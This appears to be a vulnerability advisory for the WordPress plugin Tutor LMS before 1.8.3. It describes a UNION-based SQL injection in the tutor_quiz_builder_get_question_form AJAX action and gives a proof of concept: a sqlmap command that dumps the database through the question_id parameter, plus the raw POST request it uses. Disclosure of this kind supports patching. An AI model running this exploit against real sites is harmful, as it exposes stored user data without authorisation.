Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_question_form

The tutor_quiz_builder_get_question_form AJAX action from the plugin was vulnerable to UNION based SQL injection that could be exploited by students.

PoC

python3 sqlmap.py -r ~/tutorunion4.txt --dbms=mysql --technique=U -p question_id --dump Where tutorunion4.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 96 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close action=tutor_quiz_builder_get_question_form&question;_id=1&quiz;_id